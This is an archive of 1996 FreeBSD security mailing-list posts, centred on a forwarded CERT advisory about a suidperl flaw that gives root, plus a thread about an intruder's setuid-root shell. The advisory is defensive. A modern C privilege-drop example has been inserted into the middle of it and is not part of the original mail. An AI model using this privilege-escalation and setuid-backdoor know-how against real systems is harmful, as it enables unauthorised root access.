To: "'freebsd-security@freebsd.org'", "'freebsd-questions'"
Subject: Anybody using FrontPage server extensions for BSDI ? (DES-related)
Date: Wed, 26 Jun 1996 04:49:58 +0200
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.12.736
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BB631A.F0A02FF0"
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

FrontPage 1.1 server extension seems to run on 960501-SNAP, but it encrypts
passwords with something different than the standard MD5.

I've got the .za DES package, and I think I've managed to install it
correctly, but FrontPage authentication is still failing.

How can I check whether my crypt shared libraries are really doing DES?
What other encryption might they be using (after all, if DES was not in my
system, how the hell was FrontPage able to save a DES-encrypted password for
the administrator during setup??? :-)

Is anybody using FrontPage Extensions on FreeBSD?

I'm not on these lists, please Cc: replies to me.

Thanks
Angelo.

-----------------------------------------------------------------
Angelo Turetta                        mailto:aturetta@stylo.it
Stylo Multimedia - Bologna - Italy    http://www.stylo.it/

From owner-freebsd-security Tue Jun 25 20:15:20 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA29141 for security-outgoing; Tue, 25 Jun 1996 20:15:20 -0700 (PDT)
Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA29117; Tue, 25 Jun 1996 20:15:11 -0700 (PDT)
Received: from msmith@localhost by genesis.atrad.adelaide.edu.au (8.6.12/8.6.9) id MAA02789; Wed, 26 Jun 1996 12:31:17 +0930
From: Michael Smith
Message-Id: <199606260301.MAA02789@genesis.atrad.adelaide.edu.au>
Subject: Re: Anybody using FrontPage server extensions for BSDI ? (DES-related)
To: ATuretta@stylo.it (Angelo Turetta)
Date: Wed, 26 Jun 1996 12:31:17 +0930 (CST)
Cc: freebsd-security@FreeBSD.org, freebsd-questions@FreeBSD.org
In-Reply-To: from "Angelo Turetta" at Jun 26, 96 04:49:58 am
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Angelo Turetta stands accused of saying:
>
> FrontPage 1.1 server extension seems to run on 960501-SNAP, but it encrypts
> passwords with something different than the standard MD5.
>
> I've got the .za DES package, and I think I've managed to install it
> correctly, but FrontPage authentication is still failing.

Can't help with that, sorry.

> How can I check whether my crypt shared libraries are really doing DES ?
> What other encryption might they be using (after all, if DES was not in my
> system, how the hell was FrontPage able to save a DES-encrypted password for
> the administrator during setup ??? :-)

It's almost certainly statically linked.

> Angelo Turetta                        mailto:aturetta@stylo.it

--
]] Mike Smith, Software Engineer        msmith@atrad.adelaide.edu.au    [[
]] Genesis Software                     genesis@atrad.adelaide.edu.au   [[
]] High-speed data acquisition and      (GSM mobile) 0411-222-496       [[
]] realtime instrument control          (ph/fax)  +61-8-267-3039        [[
]] Collector of old Unix hardware.      "Where are your PEZ?" The Tick  [[

From owner-freebsd-security Tue Jun 25 22:24:37 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA06572 for security-outgoing; Tue, 25 Jun 1996 22:24:37 -0700 (PDT)
Received: from MindBender.HeadCandy.com (root@[199.238.225.168]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA06512; Tue, 25 Jun 1996 22:21:54 -0700 (PDT)
Received: from localhost.HeadCandy.com (michaelv@localhost.HeadCandy.com [127.0.0.1]) by MindBender.HeadCandy.com (8.7.5/8.7.3) with SMTP id WAA00500; Tue, 25 Jun 1996 22:11:17 -0700 (PDT)
Message-Id: <199606260511.WAA00500@MindBender.HeadCandy.com>
X-Authentication-Warning: MindBender.HeadCandy.com: Host michaelv@localhost.HeadCandy.com [127.0.0.1] didn't use HELO protocol
To: -Vince-
cc: "Eric J. Schwertfeger", Mark Murray, hackers@freebsd.org, security@freebsd.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of Tue, 25 Jun 96 13:03:06 -0700.
Date: Tue, 25 Jun 1996 22:11:14 -0700
From: "Michael L. VanLoon -- HeadCandy.com"
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>On Tue, 25 Jun 1996, Eric J. Schwertfeger wrote:
>> On Tue, 25 Jun 1996, -Vince- wrote:

>> > Yeah, you have a point but jbhunt was watching the user as he
>> > hacked root since he brought the file from his own machine.... so that
>> > wasn't something the admin was tricked into doing..

>> Then the important question is, how did he move the file so that it
>> retained the setuid bit? We're already pretty sure that the program is
>> only /bin/sh with the setuid bit turned on. So either he found a way to
>> move the file with the bit turned on, or he found a way to turn it on,
>> which requires root access.

> It was a remote login so he had to transfer it over somehow...

Well, *if* that's true, it still wouldn't be setuid root just from the
transfer. He'd *still* have to get root some other way to make this
binary setuid root.

But if he's going to do that, why bother copying a binary over the
network -- it would just be easier to just snag a copy of your own
/bin/sh and mark it setuid root.

-----------------------------------------------------------------------------
  Michael L. VanLoon                                 michaelv@HeadCandy.com
       --<  Free your mind and your machine -- NetBSD free un*x  >--
     NetBSD working ports: 386+PC, Mac 68k, Amiga, Atari 68k, HP300, Sun3,
         Sun4/4c/4m, DEC MIPS, DEC Alpha, PC532, VAX, MVME68k, arm32...
     NetBSD ports in progress: PICA, others...

   Roll your own Internet access -- Seattle People's Internet cooperative.
                  If you're in the Seattle area, ask me how.
-----------------------------------------------------------------------------

From owner-freebsd-security Tue Jun 25 23:21:56 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA11108 for security-outgoing; Tue, 25 Jun 1996 23:21:56 -0700 (PDT)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA11101 for ; Tue, 25 Jun 1996 23:21:51 -0700 (PDT)
Received: by gvr.win.tue.nl (8.6.12/1.53) id IAA22374; Wed, 26 Jun 1996 08:21:36 +0200
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199606260621.IAA22374@gvr.win.tue.nl>
Subject: Re: List of freebsd security advisories?
To: lithium@cia-g.com (Stephen Fisher)
Date: Wed, 26 Jun 1996 08:21:35 +0200 (MET DST)
Cc: freebsd-security@freebsd.org
In-Reply-To: from Stephen Fisher at "Jun 25, 96 03:31:07 pm"
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Stephen Fisher wrote:
>
> Hello,
>
> Anyone have an archive of the FreeBSD security advisories? I'd like to
> be able to fix the problems on newly installed 2.1R systems.
>

ftp://freefall.cdrom.com:/pub/CERT

-Guido

From owner-freebsd-security Wed Jun 26 03:57:27 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA00754 for security-outgoing; Wed, 26 Jun 1996 03:57:27 -0700 (PDT)
Received: from bdd.net ([207.61.78.33]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA00749; Wed, 26 Jun 1996 03:57:23 -0700 (PDT)
Received: from localhost (james@localhost) by bdd.net (8.7.5/8.7.3) with SMTP id GAA16888; Wed, 26 Jun 1996 06:57:21 -0400 (EDT)
Date: Wed, 26 Jun 1996 06:57:19 -0400 (EDT)
From: James FitzGibbon
To: "Jonathan M. Bresler"
cc: freebsd-announce@freefall.freebsd.org, freebsd-security@freefall.freebsd.org
Subject: Re: FreeBSD-security-digest NEW mailing list
In-Reply-To: <199606260038.RAA14485@freefall.freebsd.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Jonathan M. Bresler wrote:

> freebsd-security-digest is a new mailing list available from FreeBSD.org
>
> to subscribe send mail to majordomo@freebsd.org containing the single line:
> "subscribe freebsd-security-digest"
>
> this digest will contain all the messages mailed to freebsd-security.
> the messages will be collected together and sent out as a single mailing
> on a semi-periodic basis (size and time are the criteria).

Great idea to cut down on the traffic around security discussions, but
when an advisory comes out, time is of the essence. The creation of a
digested security discussion list would seem to call for the creation of a
security "advisory" list that only select people (security-officer, etc.)
could post to.

Using this method, one could read the general discussion surrounding
security issues without compromising the speed with which they get
important advisories.

--
j.
----------------------------------------------------------------------------
| James FitzGibbon                                      james@nexis.net  |
| Integrator, The Nexis Group                  Voice/Fax : 416 410-0100  |
----------------------------------------------------------------------------

From owner-freebsd-security Wed Jun 26 04:33:16 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA03224 for security-outgoing; Wed, 26 Jun 1996 04:33:16 -0700 (PDT)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id EAA03217; Wed, 26 Jun 1996 04:33:11 -0700 (PDT)
Received: by gvr.win.tue.nl (8.6.12/1.53) id NAA22978; Wed, 26 Jun 1996 13:32:55 +0200
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199606261132.NAA22978@gvr.win.tue.nl>
Subject: Re: FreeBSD-security-digest NEW mailing list
To: james@nexis.net (James FitzGibbon)
Date: Wed, 26 Jun 1996 13:32:55 +0200 (MET DST)
Cc: jmb@freefall.freebsd.org, freebsd-announce@freefall.freebsd.org, freebsd-security@freefall.freebsd.org
In-Reply-To: from James FitzGibbon at "Jun 26, 96 06:57:19 am"
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

James FitzGibbon wrote:
> On Tue, 25 Jun 1996, Jonathan M. Bresler wrote:
>
> > freebsd-security-digest is a new mailing list available from FreeBSD.org
> >
> > to subscribe send mail to majordomo@freebsd.org containing the single line:
> > "subscribe freebsd-security-digest"
> >
> > this digest will contain all the messages mailed to freebsd-security.
> > the messages will be collected together and sent out as a single mailing
> > on a semi-periodic basis (size and time are the criteria).
>
> Great idea to cut down on the traffic around security discussions, but
> when an advisory comes out, time is of the essence. The creation of a
> digested security discussion list would seem to call for the creation of a
> security "advisory" list that only select people (security-officer, etc.)
> could post to.
>
> Using this method, one could read the general discussion surrounding
> security issues without compromising the speed with which they get
> important advisories.

Read an advisory and subscribe to the actual mailing list.
-Guido

From owner-freebsd-security Wed Jun 26 11:41:08 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA26621 for security-outgoing; Wed, 26 Jun 1996 11:41:08 -0700 (PDT)
Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA26612 for ; Wed, 26 Jun 1996 11:40:55 -0700 (PDT)
Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id OAA04419 for ; Wed, 26 Jun 1996 14:37:19 -0400 (EDT)
Date: Wed, 26 Jun 1996 14:38:13 -0400 (EDT)
From: Brian Tao
To: FREEBSD-SECURITY-L
Subject: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

    I believe this applies to perl4 as shipped with all versions of
FreeBSD, as well as the perl5 packages/ports. Does anyone know what
the actual vulnerability is?
--
Brian Tao (BT300, taob@io.org, taob@ican.net)
Systems and Network Administrator, Internet Canada Corp.
"Though this be madness, yet there is method in't"

---------- Forwarded message ----------
Date: Wed, 26 Jun 1996 11:41:55 -0400
From: CERT Advisory
Reply-To: cert-advisory-request@cert.org
To: cert-advisory@cert.org
Subject: CERT Advisory CA-96.12 - Vulnerability in suidperl

=============================================================================
CERT(sm) Advisory CA-96.12
June 26, 1996

Topic: Vulnerability in suidperl
-----------------------------------------------------------------------------

The CERT Coordination Center has received reports of a vulnerability in
systems that contain the suidperl program and that support saved
set-user-ID and saved set-group-ID. By exploiting this vulnerability,
anyone with access to an account on such a system may gain root access.

Saved set-user-IDs and set-group-IDs are sometimes referred to as POSIX
saved IDs. suidperl is also known as sperl followed by a version number,
as in sperl5.002.

Perl versions 4 and 5 can be compiled and installed in such a way that
they will be vulnerable on some systems. If you have installed the
suidperl or sperl programs on a system that supports saved set-user-ID
and set-group-ID, you may be at risk.

The CERT Coordination Center recommends that you first disable the
suidperl and sperl programs (Section III.A). If you need the
functionality, we further recommend that you either apply a patch for
this problem or install Perl version 5.003 (Section III.B). If neither a
patch nor a new version is a viable alternative, we recommend installing
the wrapper written by Larry Wall as a workaround for this problem
(Section III.C).

As we receive additional information relating to this advisory, we will
place it in
        ftp://info.cert.org/pub/cert_advisories/CA-96.12.README

We encourage you to check our README files regularly for updates on
advisories that relate to your site.

-----------------------------------------------------------------------------

I.   Description

     On some systems, setuid and setgid scripts (scripts written in the C
     shell, Bourne shell, or Perl, for example, with the set user or group
     ID permissions enabled) are insecure due to a race condition in the
     kernel. For those systems, Perl versions 4 and 5 attempt to work
     around this vulnerability with a special program named suidperl, also
     known as sperl. Even on systems that do provide a secure mechanism for
     setuid and setgid scripts, suidperl may also be installed--although it
     is not needed.

     suidperl attempts to emulate the set-user-ID and set-group-ID features
     of the kernel. Depending on whether the script is set-user-ID,
     set-group-ID, or both, suidperl achieves this emulation by first
     changing its effective user or group ID to that of the original Perl
     script. suidperl then reads and executes the script as that effective
     user or group. To do these user and group ID changes correctly,
     suidperl must be installed as set-user-ID root.

     On systems that support saved set-user-ID and set-group-ID, suidperl
     does not properly relinquish its root privileges when changing its
     effective user and group IDs.

II.  Impact

     On a system that has the suidperl or sperl program installed and that
     supports saved set-user-ID and saved set-group-ID, anyone with access
     to an account on the system can gain root access.

III. Solution

     The command in Section A helps you determine if your system is
     vulnerable and, if it is, optionally disables the suidperl and sperl
     programs that it locates. After you have run this command on all of
     your systems, your system will no longer be vulnerable.

     If you find that your system is vulnerable, then you need to replace
     the suidperl and sperl programs with new versions. Section B describes
     how to do that.

     Finally, Section C identifies a wrapper that can be used in place of
     the suidperl program.

     A. How to determine if your system is vulnerable

        To determine if a system is vulnerable to this problem and to
        disable the programs that are believed to be vulnerable, use the
        following find command or a variant. Consult your local system
        documentation to determine how to tailor the find program on your
        system.

        You will need to run the find command on each system you maintain
        because the command examines files on the local disk only.
        Substitute the names of your local file systems for
        FILE_SYSTEM_NAMES in the example. Example local file system names
        are /, /usr, and /var. You must do this as root.

        Note that this is one long command, though we have separated it
        onto three lines using back-slashes.

            find FILE_SYSTEM_NAMES -xdev -type f -user root \
                \( -name 'sperl[0-9].[0-9][0-9][0-9]' -o -name \
                'suidperl' \) -perm -04000 -print -ok chmod ug-s '{}' \;

        This command will find all files on a system that are
          - only in the file system you name (FILE_SYSTEM_NAMES -xdev)
          - regular files (-type f)
          - owned by root (-user root)
          - named appropriately (-name 'sperl[0-9].[0-9][0-9][0-9]' -o -name 'suidperl')
          - setuid root (-perm -04000)

        Once found, those files will
          - have their names printed (-print)
          - have their modes changed, but only if you type `y' in response
            to the prompt (-ok chmod ug-s '{}' \;)

     B. Obtain and install the appropriate patch according to the
        instructions included with the patch.

        Vendor patches
        --------------

        You may be vulnerable if your vendor supports saved set-user-ID and
        set-group-ID and ships suidperl or sperl. You need to get a patched
        version from your vendor. Appendix A contains information provided
        by vendors as of the date of this advisory. When we receive updated
        information, we will put it in CA-96.12.README.

        Until you can install a patch, we recommend disabling suidperl. The
        find command above will help you do that. If you need suidperl or
        sperl, an alternative is to install the wrapper described in
        Section C.
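Section I above says the flaw is that suidperl changed only its effective user and group IDs, so on a system with POSIX saved IDs the saved set-user-ID still held root. The C program below is an added example (not code from the CERT advisory or from Perl): it shows the effective-ID-only change beside a permanent drop, plus a self-check a setuid-root program can run to confirm root cannot be regained. It assumes a POSIX system with saved set-user-IDs; uid/gid 65534 is a constructed placeholder for an unprivileged account.

```c
/*
 * Added example, not code from the CERT advisory or from Perl's suidperl.
 * Contrasts the effective-ID-only change the advisory describes with a
 * permanent privilege drop, and includes a self-check that root cannot
 * be regained. Assumes a POSIX system with saved set-user-IDs; uid/gid
 * 65534 in main() is a constructed placeholder for an unprivileged account.
 */
#define _GNU_SOURCE
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Flawed pattern: only the effective IDs move; the saved IDs still hold root. */
int drop_effective_only(uid_t uid, gid_t gid)
{
    if (setegid(gid) != 0 || seteuid(uid) != 0)
        return -1;
    return 0;
}

/*
 * Returns 1 if the process can still become euid 0 (the condition the
 * advisory describes), 0 if it cannot. A successful probe is undone so
 * the caller's credentials are left as they were.
 */
int privileges_regainable(void)
{
    uid_t before = geteuid();

    if (before == 0)
        return 1;
    if (seteuid(0) != 0)
        return 0;               /* EPERM: no saved root to fall back on */
    if (seteuid(before) != 0)
        perror("seteuid(restore)");
    return 1;
}

/*
 * Correct pattern: with euid 0, setgid()/setuid() set the real, effective
 * and saved IDs together, so there is nothing left to return to.
 * Groups go first, because after setuid() they can no longer be changed.
 * Returns 0 on success, -1 if any step fails or root is still reachable.
 */
int drop_privileges_permanently(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0)  /* drop supplementary groups */
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    /* Verify: a non-root target must not be able to get root back. */
    if (uid != 0 && privileges_regainable())
        return -1;
    return 0;
}

int main(void)
{
    const uid_t target_uid = 65534;     /* constructed placeholder, e.g. "nobody" */
    const gid_t target_gid = 65534;

    if (geteuid() != 0) {
        printf("not root, nothing to drop; regainable=%d\n", privileges_regainable());
        return 0;
    }

    /* 1. The suidperl-style change: effective IDs only. Prints regainable=1. */
    if (drop_effective_only(target_uid, target_gid) != 0)
        return 1;
    printf("after seteuid/setegid only: regainable=%d\n", privileges_regainable());

    /* Back to root, possible precisely because the saved ID was kept... */
    if (seteuid(0) != 0 || setegid(0) != 0)
        return 1;

    /* 2. ...then the permanent drop. Prints regainable=0. */
    if (drop_privileges_permanently(target_uid, target_gid) != 0) {
        perror("drop_privileges_permanently");
        return 1;
    }
    printf("after setgid/setuid: regainable=%d\n", privileges_regainable());
    return 0;
}
```

Run as root it prints regainable=1 after the effective-only change and regainable=0 after the permanent drop; run unprivileged it only reports that root is not reachable.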
        Source code patches
        -------------------

        If you have installed Perl from source code, you should install
        source code patches. Patches are available from the CPAN
        (Comprehensive Perl Archive Network) archives.

        Patch for Perl Version 4:
            File            src/fixsuid4-0.pat
            MD5 Checksum    af3e3c40bbaafce134714f1381722496

        Patch for Perl Version 5:
            File            src/fixsuid5-0.pat
            MD5 Checksum    135c96ee400fd37a38a7ef37edd489e9

        In addition, Perl version 5.003 contains this patch, so installing
        it on your system also addresses this vulnerability. Perl 5.003 is
        available from the CPAN archives. Here are the specifics:
            File            src/5.0/perl5.003.tar.gz
            MD5 Checksum    b1bb23995cd25e5b750585bfede0e8a5

        The CPAN archives can be found at the following locations:

        CPAN master site
            ftp://ftp.funet.fi/pub/languages/perl/CPAN/
        Africa
            ftp://ftp.is.co.za/programming/perl/CPAN/
        Asia
            ftp://dongpo.math.ncu.edu.tw/perl/CPAN/
            ftp://ftp.lab.kdd.co.jp/lang/perl/CPAN/
        Australasia
            ftp://coombs.anu.edu.au/pub/perl/
            ftp://ftp.mame.mu.oz.au/pub/perl/CPAN/
            ftp://ftp.tekotago.ac.nz/pub/perl/CPAN/
        Europe
            ftp://ftp.arnes.si/software/perl/CPAN/
            ftp://ftp.ci.uminho.pt/pub/lang/perl/
            ftp://ftp.cs.ruu.nl/pub/PERL/CPAN/
            ftp://ftp.demon.co.uk/pub/mirrors/perl/CPAN/
            ftp://ftp.funet.fi/pub/languages/perl/CPAN/
            ftp://ftp.ibp.fr/pub/perl/CPAN/
            ftp://ftp.leo.org/pub/comp/programming/languages/perl/CPAN/
            ftp://ftp.pasteur.fr/pub/computing/unix/perl/CPAN/
            ftp://ftp.rz.ruhr-uni-bochum.de/pub/programming/languages/perl/CPAN/
            ftp://ftp.sunet.se/pub/lang/perl/CPAN/
            ftp://ftp.switch.ch/mirror/CPAN/
            ftp://unix.hensa.ac.uk/mirrors/perl-CPAN/
        North America
            ftp://ftp.cis.ufl.edu/pub/perl/CPAN/
            ftp://ftp.delphi.com/pub/mirrors/packages/perl/CPAN/
            ftp://ftp.sedl.org/pub/mirrors/CPAN/
            ftp://ftp.sterling.com/programming/languages/perl/
            ftp://ftp.uoknor.edu/mirrors/CPAN/
            ftp://uiarchive.cso.uiuc.edu/pub/lang/perl/CPAN/

     C. If you need setuid or setgid Perl scripts and are unable to apply
        the source code patches listed in Section B, we suggest that you
        retrieve Larry Wall's fixsperl script noted below. fixsperl is a
        script that replaces the suidperl and sperl programs with a wrapper
        that eliminates the vulnerability.

        The script is available from the CPAN archives as
            File            src/fixsperl-0
            MD5 Checksum    f13900d122a904a8453a0af4c1bdddc6

        Note that this script should be run one time, naming every suidperl
        or sperl file on your system. If you add another version of
        suidperl or sperl to your system, then you must run fixsperl on
        those newly installed versions.

---------------------------------------------------------------------------
The CERT Coordination Center staff thanks Paul Traina, Larry Wall, Eric
Allman, Tom Christiansen, and AUSCERT for their support in the development
of this advisory.
---------------------------------------------------------------------------

If you believe that your system has been compromised, contact the CERT
Coordination Center or your representative in the Forum of Incident
Response and Security Teams (FIRST).

We strongly urge you to encrypt any sensitive information you send by
email. The CERT Coordination Center can support a shared DES key and PGP.
Contact the CERT staff for more information.

Location of CERT PGP key
         ftp://info.cert.org/pub/CERT_PGP.key

CERT Contact Information
------------------------
Email    cert@cert.org

Phone    +1 412-268-7090 (24-hour hotline)
                CERT personnel answer 8:30-5:00 p.m. EST(GMT-5)/EDT(GMT-4),
                and are on call for emergencies during other hours.
Fax      +1 412-268-6989

Postal address
         CERT Coordination Center
         Software Engineering Institute
         Carnegie Mellon University
         Pittsburgh PA 15213-3890
         USA

CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
        http://www.cert.org/
        ftp://info.cert.org/pub/

CERT advisories and bulletins are also posted on the USENET newsgroup
comp.security.announce

To be added to our mailing list for CERT advisories and bulletins, send
your email address to
        cert-advisory-request@cert.org

Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission
provided it is used for non-commercial purposes and the copyright
statement is included.

CERT is a service mark of Carnegie Mellon University.

.........................................................................

Appendix A: Vendor Information

Current as of June 26, 1996
See CA-96.12.README for updated information.

Below is information we have received from vendors concerning the
vulnerability described in this advisory. If you do not see your vendor's
name, please contact the vendor directly for information.

Apple Computer, Inc.
====================
  A/UX 3.1.1 and earlier support saved set-{user,group}-ids.
  A/UX 3.1.1 and earlier do not have Perl as part of the standard product.

Data General Corporation
========================
  Data General does support saved set-user-IDs and set-group-IDs on DG/UX.
  Data General does not ship suidperl or sperl* with DG/UX.

Hewlett-Packard Company
=======================
  HP/UX versions 8.X, 9.X, and 10.X all support saved set-user-id.
  None of HP/UX versions 8.X, 9.X, and 10.X have Perl as part of the
  standard product.

IBM Corporation
===============
  AIX versions 3.2.5 and 4.X support saved set-user-id.
  AIX versions 3.2.5 and 4.X do not have Perl as part of the standard
  product.
  However, the SP2's PSSP software does contain suidperl, but the program
  is not installed with the setuid bit set.

Linux
=====
  Linux 1.2 and 2.0 support saved set-user-id.
  Most distributions of Linux provide suidperl and sperl.
  The fixsperl script works on linux, and it is recommended that this fix
  be applied until a new Perl release is made.

Open Software Foundation
========================
  OSF/1 1.3 or later support saved set-user-id
  OSF/1 1.3 or later does not have Perl as part of the standard product.

Sony Corporation
================
  NEWS-OS 4.X does not support saved set-user-id and therefore any version
  of Perl on that system is not vulnerable.
  NEWS-OS 6.X does support saved set-user-id.

X.org
=====
  None of X.org's development systems are vulnerable to the saved
  set-user-IDs and set-group-IDs problems, and suidperl is not shipped
  with either of our products.

From owner-freebsd-security Wed Jun 26 12:14:56 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA28903 for security-outgoing; Wed, 26 Jun 1996 12:14:56 -0700 (PDT)
Received: from rocky.mt.sri.com (rocky.sri.MT.net [204.182.243.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA28897 for ; Wed, 26 Jun 1996 12:14:52 -0700 (PDT)
Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id NAA05459; Wed, 26 Jun 1996 13:14:32 -0600 (MDT)
Date: Wed, 26 Jun 1996 13:14:32 -0600 (MDT)
Message-Id: <199606261914.NAA05459@rocky.mt.sri.com>
From: Nate Williams
To: Brian Tao
Cc: FREEBSD-SECURITY-L
Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd)
In-Reply-To:
References:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> I believe this applies to perl4 as shipped with all versions of
> FreeBSD, as well as the perl5 packages/ports. Does anyone know what
> the actual vulnerability is?

I don't, but thanks for bringing this up. I was planning on bringing
this in but I forgot. I just applied the suggested change to the
version of perl in -stable and -current, so it'll be in 2.1.5.

Nate

From owner-freebsd-security Wed Jun 26 13:05:42 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA04975 for security-outgoing; Wed, 26 Jun 1996 13:05:42 -0700 (PDT)
Received: from ns2.harborcom.net (root@ns2.harborcom.net [206.158.4.4]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA04963 for ; Wed, 26 Jun 1996 13:05:34 -0700 (PDT)
Received: from swoosh.dunn.org (swoosh.dunn.org [206.158.7.243]) by ns2.harborcom.net (8.7.4/8.6.12) with SMTP id QAA23146; Wed, 26 Jun 1996 16:05:16 -0400 (EDT)
Message-Id: <199606262005.QAA23146@ns2.harborcom.net>
Comments: Authenticated sender is
From: "Bradley Dunn"
Organization: Harbor Communications
To: Nate Williams
Date: Wed, 26 Jun 1996 16:00:42 -0500
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd
Reply-to: dunn@harborcom.net
CC: FREEBSD-SECURITY-L
Priority: normal
X-mailer: Pegasus Mail for Win32 (v2.31)
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On 26 Jun 96 at 13:14, Nate Williams wrote:

> > I believe this applies to perl4 as shipped with all versions of
> > FreeBSD, as well as the perl5 packages/ports. Does anyone know what
> > the actual vulnerability is?
>
> I don't, but thanks for bringing this up. I was planning on bringing
> this in but I forgot. I just applied the suggested change to the
> version of perl in -stable and -current, so it'll be in 2.1.5.

The port should be upgraded to 5.003 as well.

Bradley Dunn

From owner-freebsd-security Wed Jun 26 13:07:35 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA05097 for security-outgoing; Wed, 26 Jun 1996 13:07:35 -0700 (PDT)
Received: from rocky.mt.sri.com (rocky.sri.MT.net [204.182.243.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA05084 for ; Wed, 26 Jun 1996 13:07:31 -0700 (PDT)
Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id OAA05767; Wed, 26 Jun 1996 14:06:46 -0600 (MDT)
Date: Wed, 26 Jun 1996 14:06:46 -0600 (MDT)
Message-Id: <199606262006.OAA05767@rocky.mt.sri.com>
From: Nate Williams
To: dunn@harborcom.net
Cc: Nate Williams, FREEBSD-SECURITY-L
Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd
In-Reply-To: <199606262005.QAA23146@ns2.harborcom.net>
References: <199606262005.QAA23146@ns2.harborcom.net>
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Bradley Dunn writes:
> On 26 Jun 96 at 13:14, Nate Williams wrote:
>
> > > I believe this applies to perl4 as shipped with all versions of
> > > FreeBSD, as well as the perl5 packages/ports. Does anyone know what
> > > the actual vulnerability is?
> >
> > I don't, but thanks for bringing this up. I was planning on bringing
> > this in but I forgot. I just applied the suggested change to the
> > version of perl in -stable and -current, so it'll be in 2.1.5.
>
> The port should be upgraded to 5.003 as well.

I'm not a ports dude. Send email to satoshi and/or gary about the ports.

Nate

From owner-freebsd-security Wed Jun 26 13:23:21 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA07968 for security-outgoing; Wed, 26 Jun 1996 13:23:21 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA07955 for ; Wed, 26 Jun 1996 13:23:18 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id RAA19313; Tue, 25 Jun 1996 17:35:44 -0700 (PDT)
Date: Tue, 25 Jun 1996 17:35:44 -0700 (PDT)
From: -Vince-
To: "Jonathan M. Bresler"
cc: jbhunt, mark@grumble.grondar.za, msmith@atrad.adelaide.edu.au, mark@grondar.za, security@FreeBSD.ORG, chad@mercury.gaianet.net
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606260020.RAA12620@freefall.freebsd.org>
